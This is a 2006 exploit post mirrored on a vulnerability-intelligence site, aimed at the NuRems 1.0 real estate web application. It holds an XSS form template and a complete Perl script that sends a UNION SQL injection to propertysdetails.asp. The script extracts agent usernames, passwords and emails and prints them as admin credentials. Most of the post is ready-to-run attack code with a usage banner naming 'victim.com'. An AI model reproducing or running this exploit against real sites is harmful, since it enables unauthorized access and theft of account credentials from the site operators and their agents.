Lucene search

nurems-10.txt

🗓️ 14 Nov 2006 00:00:00Reported by ajannType

packetstorm🔗 packetstormsecurity.com👁 19 Views

NuRems 1.0 Remote XSS/SQL Injection Exploi

`From:Filistin,Lubnan,IraQ,Turkey  
NuRems 1.0 Remote XSS/SQL Injection Exploit  
  
XSS:  
  
<form name=RequestForm action="http://x/sch1.asp" method="POST">  
<select name="stcode" size=10>  
<option value="XSS HERE">Alabama  
</select>   
<td align=center>  
<INPUT TYPE="submit" VALUE="Show cities...">  
</form>  
  
/XSS  
  
SQL: propertysdetails.asp?PropID= SQL  
  
/SQL  
  
  
#!/usr/bin/perl  
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit  
#[Coded by : ajann  
#[Author : ajann  
#[Contact : :(  
  
use IO::Socket;  
if(@ARGV < 3){  
print "  
[========================================================================  
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit  
[// Usage: class.pl [target] [path] [userid]  
[// Example: exploit.pl victim.com / 1  
[// Example: exploit.pl victim.com /path/ 1  
[// Vuln&Exp : ajann  
[========================================================================  
";  
exit();  
}  
#Local variables  
$server = $ARGV[0];  
$server =~ s/(http:\/\/)//eg;  
$host = "http://".$server;  
$port = "80";  
$dir = $ARGV[1];  
$file = "propertysdetails.asp?PropID=";  
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];  
$target = $host.$dir.$file.$target;  
  
#Writing data to socket  
print "+**********************************************************************+\n";  
print "+ Trying to connect: $server\n";  
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";  
print $socket "GET $target\n";  
print $socket "Host: $server\n";  
print $socket "Accept: */*\n";  
print $socket "Connection: close\n\n";  
print "+ Connected!...\n";  
#Getting  
while($answer = <$socket>) {  
if ($answer =~ /Location:(.*?)<\/font>/){   
print "+ Exploit succeed! Getting admin information.\n";  
print "+ ---------------- +\n";  
print "+ Username: $1\n";  
}  
  
if ($answer =~ /Address:(.*?)<\/font>/){   
print "+ Password: $1\n";  
}  
  
if ($answer =~ /# Rooms:(.*?)<\/font>/){   
print "+ Email: $1\n";  
exit();  
}  
  
if ($answer =~ /Ad removed or not yet approved/) {   
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
  
if ($answer =~ /Internal Server Error/) {  
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
}  
  
  
print "+ Exploit failed :(\n";  
print "+**********************************************************************+\n";  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

14 Nov 2006 00:00Current

7.4High risk

Vulners AI Score7.4